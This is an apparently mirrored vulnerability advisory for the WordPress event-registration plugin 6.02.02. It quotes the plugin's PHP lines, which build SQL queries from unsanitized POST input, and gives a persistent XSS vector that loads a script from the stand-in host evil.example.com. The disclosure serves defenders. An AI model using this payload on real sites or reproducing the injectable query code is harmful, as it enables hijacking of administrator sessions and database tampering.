Vulners
Lucene search
WordPress Event Registration 6.02.02 XSS / SQL Injection
🗓️ 09 May 2016 00:00:00Reported by Michael HelwigType 
packetstorm🔗 packetstormsecurity.com👁 33 Views
`* Exploit Title: WordPress Plugin event-registration 6.02.02: SQL-Injection and persistent XSS
* Discovery Date: 2016/03/13
* Public Disclosure Date: 2016/05/09
* Exploit Author: Michael Helwig
* Contact: https://twitter.com/c0dmtr1x | https://codemetrix.net
* Vendor Homepage: http://wpeventregister.com/
* Software Link: https://plugins.svn.wordpress.org/event-registration/tags/6.02.02/
* Version: 6.02.02
* Tested on: WordPress 4.4.1
* Category: webapps
DESCRIPTION
-----------
The plugin event-registration contains in its current version 6.02.02 multiple vulnerabilities:
1. SQL-Injections
There is a SQL-Injection visible in the code in evt_public-process_confirmation.php line 32
22: $submitted_token = isset($_POST['token'])?$_POST['token']:'0';
.. no sanitization of $submitted_token ...
32: $sql = 'SELECT * FROM ' . get_option('evr_attendee') . " WHERE token='{$submitted_token}'";
33: $attendee_valid = $wpdb->get_row($sql);
Another injection is in line 63:
19: $qanda = unserialize(urldecode($_POST["questions"]));
.. no sanitization of $qanda ...
61: $question_id = $qanda[$i]['question'];
62: $response = $qanda[$i]["response"];
63: if($question_id !=''){$wpdb->query("INSERT into ".get_option('evr_answer')." (registration_id, question_id, answer)
64: values ('$reg_id', '$question_id', '$response')");}
(see:
https://plugins.svn.wordpress.org/event-registration/tags/6.02.02/public/evr_public-process_confirmation.php )
2. Persistent XSS:
There is a persistent XSS in attendee's first name and last name fields on registration confirmation (evr_public-process_confirmation.php).
Quotes are escaped but the following vector still succeeds and is executed e.g. in Firefox and Chrome:
<script src=http://evil.example.com/evil.js></script>
When injected as first name or last name on the attendee's registration confirmation page (2. step in the attendee's default registration process), the
injected script gets loaded as soon as a backend user visits the list of attendees.
A demonstration of the XSS issues can be found here: https://www.youtube.com/watch?v=N4eaCAhk-a0
TIMELINE
------------
2016/03/13 - Issues discovered
2016/03/21 - Issues reported to vendor. No response.
2016/03/31 - Issues reported to wordpress security team
2016/04/01 - Reply from Wordpress security team. Plugin vanished from plugin directory shortly after.
2016/05/09 - No information about any (planned) fixes. Disclosure.
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
09 May 2016 00:00Current
0.1Low risk
Vulners AI Score0.1